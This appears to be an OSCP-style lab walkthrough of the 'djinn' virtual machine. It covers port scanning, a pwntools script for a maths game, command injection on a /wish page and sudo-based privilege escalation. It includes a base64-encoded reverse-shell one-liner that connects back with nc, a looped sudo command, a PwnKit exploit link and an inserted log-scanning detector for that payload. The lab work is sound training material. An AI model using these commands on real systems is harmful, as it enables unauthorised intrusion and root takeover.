[OSCP] djinn

admin, 2024-09-23 13:14:24

Lab overview

djinn

Difficulty: easy

Skills covered: FTP usage, port knocking, Python scripting, command execution vulnerability, sudo genie privilege escalation, program analysis, pkexec privilege escalation

Information gathering

Host discovery

Port scanning

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.47
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 02:36 EST
Nmap scan report for 192.168.1.47
Host is up (0.00068s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
|     [ASCII-art banner]
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '-', 3)
| RPCCheck:
|     [ASCII-art banner]
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '+', 4)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : [fingerprint omitted]
MAC Address: 08:00:27:9F:39:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix

The files on the anonymous FTP share give us a hint; when we connect to port 1337 the connection keeps getting reset.

The banner says we have to answer the arithmetic questions 1000 times to get through, so we write a Python script to do it:

import re
import time

import pwn

# The game on port 1337 prints a banner ending in "gift." and then one
# question per round, e.g. "(4, '-', 3)", followed by a "> " prompt.
c = pwn.remote('192.168.1.47', 1337)
c.recvuntil(b'gift.\n')

# Parse "(num1, 'op', num2)" instead of using fixed string offsets, so
# multi-digit operands are handled as well.
QUESTION = re.compile(r"\((\d+), '([+\-*/])', (\d+)\)")

count = 0

while count < 1001:
    count += 1
    data = c.recvuntil(b')').decode()
    c.recv()  # swallow the trailing "\n> " prompt
    print(data)
    m = QUESTION.search(data)
    num1, todo, num2 = int(m.group(1)), m.group(2), int(m.group(3))

    if todo == '+':
        answer = num1 + num2
    elif todo == '-':
        answer = num1 - num2
    elif todo == '*':
        answer = num1 * num2
    elif todo == '/':
        # integer division (assumed: the game wants a whole number, and
        # Python 3's "/" would return a float such as 2.0)
        answer = num1 // num2
    c.send((str(answer) + '\n').encode())
    print(answer, count)
    time.sleep(0.5)

# after the last answer the server sends the "gift" (the hint for the next step)
print(c.recv().decode())

Rescanning the ports shows that port 22 is now open.

Directory scanning

Directory brute-forcing turns up the wish directory:

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.47:7331 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.47:7331
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.47:7331/wish (Status: 200) [Size: 385]

What we find is plain command execution.

Gaining access

We use https://www.revshells.com/ to generate a reverse shell. The plain payload does not connect back here, so it has to be base64-encoded (or otherwise encoded) and decoded on the target:

echo ` echo "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjEyOSA4OTg5ID4vdG1wL2Y=" | base64 -d ` | sh -
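A defender-side counterpart to the payload above, added here as an example and not part of the original write-up: it scans constructed application log lines for the /wish endpoint (the log format, with the submitted wish after `wish=`, is an assumption) and flags entries that pipe base64-decoded data into a shell or whose decoded blobs contain reverse-shell indicators such as mkfifo and nc.

```python
import base64
import binascii
import re

# Constructed application log lines for the /wish endpoint (not from the target).
# Assumption: the app logs the submitted wish verbatim after "wish=".
SAMPLE_LOG = [
    '2024-02-22T02:40:01 192.168.1.129 POST /wish wish=id',
    '2024-02-22T02:41:17 192.168.1.129 POST /wish wish=echo ` echo '
    '"cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjEyOSA4OTg5ID4vdG1wL2Y=" '
    '| base64 -d ` | sh -',
    '2024-02-22T02:42:03 192.168.1.129 POST /wish wish=ls -la /tmp',
]

# "base64 -d" (or --decode) whose output is piped straight into a shell.
DECODE_TO_SHELL = re.compile(r'base64\s+(?:-d|--decode)[^|]*\|\s*(?:sh|bash|dash|zsh)\b')
# Base64-looking tokens long enough to be worth decoding.
B64_BLOB = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')
# Substrings typical of reverse-shell one-liners, looked for in the decoded text.
SHELL_INDICATORS = ('mkfifo', '/dev/tcp/', 'nc ', 'ncat ', 'bash -i')

def decode_blobs(text):
    """Return the printable plaintext of every base64 token that decodes cleanly."""
    out = []
    for blob in B64_BLOB.findall(text):
        try:
            plain = base64.b64decode(blob, validate=True).decode('ascii')
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in '\n\t' for ch in plain):
            out.append(plain)
    return out

def analyze(line):
    """Flag a line that decodes base64 into a shell or hides a shell payload."""
    decoded = decode_blobs(line)
    hits = sorted({i for plain in decoded for i in SHELL_INDICATORS if i in plain})
    pipes = bool(DECODE_TO_SHELL.search(line))
    return {'suspicious': pipes or bool(hits), 'pipes_decoder_to_shell': pipes,
            'decoded': decoded, 'indicators': hits}

if __name__ == '__main__':
    for ln in SAMPLE_LOG:
        verdict = analyze(ln)
        if verdict['suspicious']:
            print(ln)
            print('  indicators:', verdict['indicators'])
            for plain in verdict['decoded']:
                print('  decoded:', plain)
```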

Privilege escalation

In a hidden directory under the nitish user's home we find an SSH login password.

GTFOBins entry for genie: https://gtfobins.github.io/gtfobins/genie/

sudo -u sam /usr/bin/genie b -cmd

When the lago program is run, choose the second option, the number-guessing game: it asks you to pick a number from 1 to 100, and when you guess right it returns a shell.

Run the following command and keep entering 2 until we get a shell, escalating to root:

while true;do sudo /root/lago; done

Addendum

pkexec can also be used to escalate directly to root:

find / -perm -u=s -type f 2>/dev/null

Using the following exploit we escalate directly to root:

https://github.com/luijait/PwnKit-Exploit

End

Originally published on the WeChat official account 贝雷帽SEC: [OSCP] djinn

Reposted at CN-SEC; please keep this link when reposting (thanks to the original author): http://cn-sec.com/archives/3196633.html